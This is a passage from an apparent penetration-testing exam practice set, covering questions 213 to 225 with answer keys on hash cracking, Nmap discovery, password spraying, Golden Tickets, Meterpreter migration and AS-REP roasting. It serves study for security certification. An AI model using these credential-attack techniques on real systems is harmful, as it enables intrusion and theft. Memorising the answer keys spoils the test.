D.Hashcat mode 5500 (NetNTLMv2)
AnswerC

Hashcat mode 1000 is specifically for NTLM (NT LAN Manager) hashes, which are the format of Windows password hashes stored in SAM or extracted from LSASS. This mode correctly parses the 32-character hexadecimal NTLM hash and applies the appropriate cracking algorithms. Using this mode ensures compatibility and optimal performance for cracking NTLM hashes.

Why this answer

NTLM hashes are stored in Windows systems and are commonly extracted during penetration tests. Hashcat mode 1000 is designed to crack these hashes efficiently. Other modes correspond to different hash types, such as NetNTLMv2, Kerberos, or Linux crypt formats, and would not correctly process NTLM hashes.

Exam trap

The trap here is confusing NTLM hashes with NetNTLMv2 challenge-response pairs, which require different hash modes.

213
MCQeasy

A penetration tester is reviewing the results of a vulnerability scan and sees a finding labeled 'SSL Certificate Expired' on a web server. The tester confirms that the certificate is indeed expired. What is the most appropriate next step according to typical penetration testing methodology?

A.Document the finding, verify its impact, and include it in the final report with remediation recommendations.
B.Attempt to renew the certificate yourself to fix the issue.
C.Immediately exploit the expired certificate to gain unauthorized access.
D.Ignore the finding because expired certificates are not security vulnerabilities.
AnswerA

Penetration testing methodology involves validating findings, assessing their impact, and reporting them with remediation advice. An expired certificate is a configuration issue that can affect user trust and compliance, but it is not typically exploitable. Documenting it and recommending renewal is the correct next step.

Why this answer

The appropriate next step is to document the finding, verify its impact, and include it in the report with remediation recommendations. Expired certificates are configuration issues that can affect security and compliance but are not typically exploitable. The tester should not attempt to exploit or fix the issue unless authorized.

Ignoring it would be improper as it is a valid finding.

Exam trap

The trap here is thinking that an expired certificate is directly exploitable or that it should be ignored; it is a reportable misconfiguration, not an exploit vector.

214
MCQmedium

A penetration tester has obtained a hash from a Linux system: `$1$salt$hash`. The tester wants to crack it using John the Ripper. Which format should be specified, and what is the main weakness of this hash type?

A.sha512crypt, and the main weakness is that the iteration count is too low by default.
B.descrypt, and the main weakness is that it only uses the first 8 characters of the password.
C.bcrypt, and the main weakness is that the salt is too short, allowing rainbow table attacks.
D.md5crypt, and the main weakness is that it is fast to compute, making brute-force attacks easier.
AnswerD

The `$1$` prefix indicates md5crypt, which is based on MD5. John the Ripper uses the format 'md5crypt' for these hashes. The main weakness is that MD5 is fast, so even with salting and iterations, it can be cracked relatively quickly compared to slower algorithms like bcrypt. This makes it vulnerable to brute-force and dictionary attacks.

Why this answer

The `$1$` prefix is the identifier for md5crypt. John the Ripper supports this format with the 'md5crypt' option. The primary weakness is that MD5 is a fast hash function, so despite salting and a fixed number of iterations, it can be cracked quickly using modern hardware.

This makes it less secure than slower algorithms like bcrypt or SHA-512 crypt with high iteration counts.

Exam trap

The trap here is assuming that any salted hash is slow to crack, but md5crypt's speed makes it relatively weak despite salting.

215
MCQmedium

What is the main risk associated with storing cleartext credentials in environment variables or configuration files?

A.They are susceptible to rainbow table attacks.
B.They can be read by any user or process with sufficient file permissions.
C.They prevent the use of multi-factor authentication.
D.They automatically trigger account lockouts after one reading.
AnswerB

If a file containing cleartext credentials has overly permissive access controls, any local user or compromised process can read the file. This allows attackers to harvest high-value credentials without ever needing to perform complex password attacks, making it a critical finding during any security assessment or audit.

Why this answer

Cleartext credentials are easily accessible to anyone with local read access. In a penetration test, finding these files is a 'low-hanging fruit' that often leads to privilege escalation or lateral movement. Many applications inadvertently store sensitive data in logs, config files, or scripts, creating a security debt that attackers exploit to gain unauthorized access without needing to crack passwords through time-consuming cryptographic analysis of captured hashes.

Exam trap

Many test-takers look for complex cryptographic flaws and overlook simple operational oversights like local file permission misconfigurations exposing cleartext credentials.

216
MCQeasy

Which document should a penetration tester consult to determine the allowed scope and rules of engagement for a vulnerability scan?

A.The organization's public-facing bug bounty program policy.
B.The Rules of Engagement (RoE) document.
C.The vendor's hardware specification sheets.
D.The latest version of the Common Vulnerabilities and Exposures (CVE) list.
AnswerB

The Rules of Engagement document outlines the authorized scope, permitted testing times, and specific constraints for the engagement. It is the primary legal and operational guide that dictates how the tester can interact with the client's assets during a vulnerability assessment.

Why this answer

The Rules of Engagement (RoE) or Statement of Work (SOW) defines the legal and operational boundaries of the assessment. It specifies which systems are in scope, which are out of scope, and what scanning techniques are permitted. Adhering to these documents is essential for maintaining compliance and avoiding unauthorized actions that could lead to legal repercussions or unintended service disruption during the testing phase.

Exam trap

Candidates often confuse the Rules of Engagement with technical configuration guides or general security policies like a vulnerability management policy, forgetting that RoE specifically governs the operational boundaries and legal permissions for testing.

217
Multi-Selectmedium

You are drafting the Rules of Engagement for an internal penetration test. Which TWO of the following items are considered mandatory for the 'Communication Plan' section?

Select 2 answers
A.A list of all vulnerabilities found during the previous year's audit.
B.The names and 24/7 contact information for designated incident response leads.
C.The frequency and format of status updates throughout the engagement.
D.The specific exploit payloads that will be used during the test.
E.The estimated total cost of the project and payment schedule.
AnswersB, C

Providing 24/7 contact information for incident responders is mandatory to ensure that any potential service disruptions or critical system issues identified during the test can be addressed immediately. This prevents prolonged downtime and ensures that the client's internal security team can respond appropriately to testing activities.

Why this answer

A robust communication plan is essential for maintaining control during an engagement. By defining specific emergency protocols and status reporting cadences, both the testing team and the client minimize the risk of operational downtime. These elements ensure that technical findings are communicated effectively while providing a clear escalation path if an unexpected system failure occurs, maintaining professional accountability throughout the duration of the testing period.

Exam trap

Candidates often focus on technical reporting requirements, neglecting the human element of communication, such as emergency contact protocols and regular status updates which are critical for engagement management.

218
MCQmedium

During an internal penetration test, you need to sweep a /24 subnet for live hosts using Nmap. The client's security team has confirmed that ICMP echo requests are blocked at the host firewall on all workstations, but they want you to use a technique that still elicits responses from hosts that are up without relying on ICMP. Which Nmap host discovery option should you use to maximize host detection in this environment?

A.nmap -sn -PS22,80,443 10.10.10.0/24
B.nmap -sn -PP 10.10.10.0/24
C.nmap -sn -PE 10.10.10.0/24
D.nmap -sn -PR 10.10.10.0/24
AnswerA

The -PS option performs a TCP SYN ping to the specified ports. Hosts that are up will respond with a SYN/ACK (if the port is open) or RST (if closed), allowing discovery even when ICMP is filtered. Combining -sn with -PS22,80,443 targets common open ports, making it highly effective in this scenario where ICMP is blocked.

Why this answer

A TCP SYN ping (-PS) to common ports like 22, 80, and 443 is effective when ICMP is blocked because it uses TCP handshake responses to determine host liveness. The -sn flag suppresses port scanning and focuses on discovery. This combination reliably identifies live hosts that would otherwise be missed by ICMP-based methods.

Exam trap

The trap here is assuming that a ping sweep must use ICMP, when TCP-based pings often succeed where ICMP is filtered.

219
MCQmedium

During an internal penetration test, you capture an NTLMv2 net-NTLM hash using LLMNR/NBT-NS poisoning. You attempt to crack the hash offline using Hashcat with a standard rockyou.txt wordlist, but the operation yields no plaintext. What is the most effective next step to recover the credentials given that the password complexity requirements were met?

A.Re-capture the hash using Kerberoasting to obtain a valid Ticket Granting Service ticket for a service principal name instead of relying on the LLMNR response.
B.Convert the net-NTLMv2 hash format directly into an MD5 hash format using a custom script so that standard rainbow tables can instantly identify the plaintext password string.
C.Apply rule-based attack modes or hybrid mask attacks in Hashcat to mutate base wordlist entries with common character substitutions, appending numbers, and special symbols.
D.Downgrade the captured authentication traffic by forcing the domain controller to negotiate LM hashing during the next SMB session establishment phase to simplify cracking.
AnswerC

NTLMv2 hashing defeats plain wordlist matching because the hash incorporates challenge-response data. Rule-based and hybrid mask modes mutate rockyou entries with substitutions, appended digits, and symbols, approximating the complexity-compliant passwords that a raw dictionary attack cannot reach.

Why this answer

NTLMv2 hashes utilize a challenge-response mechanism that cannot be reversed directly, requiring offline brute-forcing or rule-based attacks against the captured challenge and response. Because standard wordlists often fail against complex alphanumeric passwords, applying dynamic rule sets or combining masks significantly expands the search space to cover permutations users typically create to satisfy strict corporate password policies during assessments.

Exam trap

Candidates often assume that failing to crack a hash with a default wordlist means the hash is entirely uncrackable or improperly captured, leading them to abandon offline attempts prematurely instead of applying rules or combinator attacks.

220
MCQmedium

Which attack type is most effective when an attacker has a list of usernames and a single password that they believe might be reused across multiple accounts?

A.Dictionary attack
B.Password spraying
C.Birthday attack
D.Rainbow table attack
AnswerB

Password spraying is designed specifically to test one known or common password against many accounts simultaneously. This strategy successfully circumvents account lockout policies that would otherwise trigger after a few failed attempts on a single account, making it highly effective for gaining initial access to large corporate environments.

Why this answer

Password spraying is a technique where an attacker tests a single password against many accounts to avoid triggering account lockout thresholds that occur with brute-forcing a single account. By keeping the number of attempts per account low, the attacker remains under the radar of security monitoring systems. This is a common tactic in modern cloud environments where individual account lockout policies are strict, making mass authentication attempts the most viable entry vector.

Exam trap

Candidates often confuse brute-forcing with password spraying, failing to realize that testing a single password across many accounts avoids lockouts.

221
MCQmedium

You have obtained Domain Admin credentials during an internal penetration test. To ensure continued access even if the compromised user's password is changed, you decide to create a Golden Ticket. Which artifact is required to forge a Golden Ticket?

A.A valid TGS for the Domain Controller.
B.The KRBTGT account's NTLM hash.
C.The Domain Admin user's NTLM hash.
D.The domain's Kerberos policy settings.
AnswerB

The KRBTGT account's NTLM hash is the secret used to sign all TGTs in the domain. With this hash, you can forge a TGT (Golden Ticket) that grants access as any user, including Domain Admin, and remains valid until the KRBTGT password is changed twice. This is the correct artifact because it is the foundation of Kerberos ticket signing.

Why this answer

A Golden Ticket is a forged Kerberos TGT signed with the KRBTGT account's NTLM hash. This hash is the ultimate secret in a Kerberos realm; with it, an attacker can impersonate any user, including Domain Admins, and maintain access even after password changes. The KRBTGT hash is obtained by compromising a Domain Controller and extracting it from memory or the NTDS.dit file.

Exam trap

The trap here is confusing a Golden Ticket with a Silver Ticket, which requires the service account's hash rather than the KRBTGT hash.

222
MCQhard

During a penetration test, a tester obtains a Meterpreter session on a Windows host but the session dies immediately after the initial connection. The tester suspects that the payload is being terminated by endpoint protection. Which Meterpreter feature should the tester use to migrate the session into a more stable process?

A.load
B.sessions -k
C.background
D.migrate
AnswerD

The migrate command in Meterpreter moves the session into another running process on the target. By migrating into a stable, long-running process such as explorer.exe, the tester can avoid having the payload terminated when the original process exits or is flagged by endpoint protection. This directly addresses the unstable session issue.

Why this answer

When a Meterpreter session is unstable because the hosting process is being terminated, migrating to a stable process is the appropriate step. The migrate command injects the Meterpreter payload into another process, ideally a long-running one like explorer.exe. Backgrounding, loading extensions, or killing the session do not address the root cause of instability.

Exam trap

The trap here is confusing backgrounding a session with migrating it; backgrounding only returns to the console and does not change the hosting process.

223
MCQmedium

During an internal penetration test, an attacker intercepts an Active Directory Kerberos AS-REQ for a user account that does not have Kerberos pre-authentication enabled. What is the most effective post-exploitation technique for the operator to perform offline credential cracking against this captured artifact?

A.Execute a DCSync attack using volume shadow copies to extract the NTDS.dit database directly from the primary domain controller.
B.Perform a Kerberoasting attack to harvest service ticket hashes for accounts with registered Service Principal Names.
C.Conduct an AS-REP roasting attack to extract the encrypted ticket portion and crack the underlying user password offline.
D.Inject a malicious golden ticket into memory after dumping the krbtgt account credentials from the lsass process.
AnswerC

Accounts configured without Kerberos pre-authentication allow anonymous request handling where the Key Distribution Center responds with an AS-REP ticket containing data encrypted with the user's password hash. Attackers capture this response and utilize GPU acceleration to perform offline dictionary attacks successfully.

Why this answer

Disabling Kerberos pre-authentication allows an attacker to request an AS-REP for any targeted user account without knowing their password. The returned ticket contains a portion encrypted with the user's NTLM hash, which can then be attacked offline using hashcat or John the Ripper to recover the plaintext password. This attack vector bypasses standard lockout policies completely since no actual authentication attempts are made against the Domain Controller during the cracking phase.

Exam trap

Candidates often suggest performing a brute-force attack against the DC. This is incorrect because AS-REP Roasting allows the operator to perform the cracking offline, avoiding any interaction with the DC's lockout policy.

224
MCQhard

A penetration tester is using Nmap to scan a target network and wants to identify open UDP ports. The tester runs a UDP scan but notices that many ports are reported as 'open|filtered'. Which technique can help determine whether these ports are actually open or filtered?

A.Use a TCP ACK scan to infer UDP port states.
B.Perform a TCP SYN scan on the same ports.
C.Run a UDP scan with a longer timeout and more retries.
D.Send a UDP packet with a known payload and analyze the response.
AnswerD

Sending a UDP packet with a payload that elicits a response from a specific service can help differentiate open ports from filtered ones. If a service is listening, it may reply with an ICMP port unreachable or a protocol-specific response. This technique is more reliable than relying on generic UDP probes.

Why this answer

Sending a UDP packet with a known payload that triggers a response from a specific service can help determine if a port is open. If the service responds, the port is open; if no response or an ICMP unreachable is received, it may be filtered. This active probing provides more definitive results than generic scans.

Exam trap

The trap here is thinking that increasing timeout or retries will resolve the 'open|filtered' state, when in fact it only addresses packet loss, not the ambiguity between open and filtered.

225
Multi-Selectmedium

A penetration tester is analyzing the results of a vulnerability scan and needs to prioritize remediation efforts. Which two factors should be considered when determining the criticality of a vulnerability? (Choose two.)

Select 2 answers
A.The potential impact on the business if exploited
B.The age of the vulnerability in the CVE database
C.The CVSS base score of the vulnerability
D.The number of other vulnerabilities on the same host
E.The scanner's confidence level in the finding
AnswersA, C

Business impact is crucial because a vulnerability with a moderate CVSS score might be critical if it affects a key asset or sensitive data. Understanding the business context helps prioritize remediation that aligns with organizational risk appetite and compliance requirements.

Why this answer

CVSS base score and business impact are key factors for prioritizing vulnerabilities. CVSS provides a standardized severity metric, while business impact ensures that remediation efforts focus on what matters most to the organization. Together, they help balance technical severity with real-world consequences.

Exam trap

The trap here is overemphasizing technical metrics like CVSS without considering business context, or vice versa, leading to misprioritization.

Page 2

Page 3 of 4

Page 4

All pages